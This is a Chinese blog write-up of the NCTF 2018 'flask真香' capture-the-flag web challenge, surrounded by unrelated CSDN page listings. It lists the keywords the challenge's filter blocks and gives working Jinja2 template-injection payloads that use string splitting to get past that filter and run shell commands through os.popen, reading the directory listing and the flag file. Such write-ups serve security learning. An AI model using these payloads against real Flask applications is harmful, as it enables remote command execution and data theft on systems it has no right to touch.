解:[NCTF 2018]flask真香--TLS_预备队任务(1)

最新推荐文章于 2023-09-04 12:53:08 发布
最新推荐文章于 2023-09-04 12:53:08 发布
阅读量671 收藏
点赞数 2
文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/river_mouth_man/article/details/129416264
版权

题目:

F12查看,没发现什么东西。

翻页发现

页面内容和url一样。

试试。

有SSTI漏洞。

一、过滤

尝试{{''.__class__}}

url内容空了,应该是被过滤了。

逐个尝试关键字,发现其过滤了这些:

class

mro

subclasses

builtins

eval

import

open

os

二、绕过关键字过滤

使用字符串拼接的方法来绕过。

{{''['__cl'+'ass__'].__bases__[0]['__subcl'+'asses__']()[]}}

找到<class 'os._wrap_close'>,没有脚本的话用蠢一点的方法。

CTRL+F查找:

我们找每个元素都有的字符 > 。

先找到os.wrap_close的位置,在找>即可得知其对应的位置

在383的位置

三、payload

{{''['__cl'+'ass__'].__bases__[0]['__subcl'+'asses__']()[383].__init__.__globals__['__bui'+'ltins__']['ev'+'al']("__im"+"port__('o'+'s').po"+"pen('ls /').read()")}}

cat flag

{{''['__cl'+'ass__'].__bases__[0]['__subcl'+'asses__']()[117].__init__.__globals__['__bui'+'ltins__']['ev'+'al']("__im"+"port__('o'+'s').po"+"pen('cat /Th1s_is__F1114g').read()")}}

重启题目后的<class 'os._wrap_close'>位置会变。

river_mouth_man
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flask-tlsauth:用于进行 TLS 客户端证书身份验证的烧瓶扩展
07-12
Flask-TLSAuth Flask-TLSAuth 集成了一个最小的证书颁发机构(CA)并实现了 TLS 客户端证书认证。 它依赖于 nginx 来处理 TLS 身份验证部分。 安装 pip install flask_tlsauth Flask-TLSAuth 依赖于 tlsauth,它提供了充当 CA 的最少工具。 请按照“CA和HTTPS服务安装”从步骤设置你的网络服务器和CA. tlsauth 装饰器 Flask-TLSAuth 提供了一个简单的装饰器来保护你的入口点: from flask import Flask , Response , redirect import os app = Flask ( __name__ ) app . secret_key = 'some secret randomness' # we need a CA from tlsauth
[NCTF 2018]flask真香
最新发布
2302_79119987的博客
06-12 1304
表单输入:检查应用程序中的所有表单,特别是那些将用户输入显示在页面上的表单字段。URL 参数:观察 URL 中的参数,特别是那些用于动态生成内容的参数。HTTP 头:某些应用程序会将 HTTP 头的信息(如 User-Agent、Referer)渲染到页面中。Cookie:有时应用程序会将 Cookie 中的值渲染到页面中。
[HCTF 2018]admin之Flask之session伪造
weixin_52116519的博客
04-22 3004
法一 法二:Flask之session伪造 原理 首先要明确cookie和session的区别:cookie放在客户端,我们可以获得的。session放在服务器,我们无法拿到的,但是flask这种轻量级的框架,session就放在了客户端,因此我们能拿来修改,这就是我们能session伪造的原因。session加密了,可以用密脚本来密。我们将一般用户的session修改为admin的session,再用加密脚本加上秘钥来加密成admin的session就OK了。 过程 参考文章 Flask之ses
Bugku-Flask_FileUpload
weixin_58595795的博客
07-27 1862
1、F12打开开发者工具,查看网页源代码,发现一段注释,(意思为给我一份文件,我会通过python运行后将结果返回给你)
NSSCTF web 刷题记录1
rev1ve的博客
09-04 1812
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
颜值经济系列深度报告之三:进击的水光针-持续高频、高增、本土化的“玻尿酸+”注射产品.pdf
09-01
这些企业不仅兼顾水光针和填充产品,还通过专利技术如NASHA技术和Vycross技术延长产品的维持时间,同时研发具有专利成分的产品,如NCTF,以满足消费者的多样化需求,并实现产品迭代。 在投资建议方面,报告推荐关注...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
刷题日记 date 6.8
m0_64348326的博客
06-08 231
1.总体来看这题还是不简单的,最难的部分是如何构造函数并返回命令执行的结果。这题用了回调+箭头函数的形式来构造payload,理起来还是很难的。2.光这道题就花了很久的时间,剩下的就没怎么看了。
NJUPTCTF-2018出题心得
郁离歌丶的博客
01-21 4517
NJUPTCTF-2018出题心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人出,但是还是有很多人要我写...
刷题记录(2023.3.6 - 2023.3.11)
Pai_Space
03-11 1333
刷题记录(2023.3.6 - 2023.3.11)
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1814
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
Flask构建的HTTPSHTTP反向Shell
www_45zq_cn的博客
09-21 439
HRShell是一个使用Flask构建的高级HTTP(S)反向Shell,其兼容python 2.x/3.x并已在以下操作系统成功测试: Linux ubuntu 18.04 LTS macOS Mojave Windows 7/10 特性 隐秘性 TLS支持 1)使用即时证书或 2)通过指定证书/密钥对 客户端的代理支持。 目录导航(cd命令和变体)。 支持download/upload/...
通过HTTPS协议运行你的Flask程序
zkt052320zkt的博客
12-10 996
我们在开发Flask应用程序时,通常通过运行Flask自带的Web服务器来开发测试,这个服务器提供了基本的但功能完备的WSGI服务器。但开发结束以后,在应用程序上线到生成环境时,有很多不得不考虑的事情,其中之一是我们是否应该要求客户端使用加密连接以增加安全性。人们总是问我这个问题,特别是如何在HTTPS协议上部署Flask服务器。在本文中,我将介绍几种为Flask应用程序添加加密的方案,从一个非常简单的可以在五秒内实现,到一个强大的就像我的网站一样可以得到一个A +评级决方案()。
【PYTHON】【FLASK】问题记录
GO THE DISTANCE !
09-16 198
flask 问题记录 1、flask request传递发送文件数据。 前端发送文件数据到一个服务,由此服务转发到另外一个服务。 requests.request 方法 files 参数说明 files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. ``file-tuple`` can be a 2-tup
[HCTF 2018]admin --- flask session 的加密
生死看淡,不服就干的博客
03-19 5217
进入靶场,没什么特殊页面,如果运气足够好的话,账号:admin,密码:123,否则注册一个用户,然后登录抓包,看能否得到有用信息 后续的一个包,也没什么有用信息,看到 session 这部分,应该是base64编码,尝试了码未得到结果,登录成功后,尝试其他功能看能否得到有用信息 修改密码部分,网页源码中有端倪 访问地址,发现更多有用信息,flask 是 python 的 web 端框架,赶紧搜索了一下 flask session Flask的session使用 利用 flask中sessi..
[NCTF 2018]签到题
10-06
[NCTF 2018]签到题是一个网页签到题目。根据提供的引用内容,我们可以通过查看网页的源代码来找到flag值。但是经过检查,我们发现没有找到flag值。另外,引用中提到了可以通过观察cookie来获取flag,但具体的方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值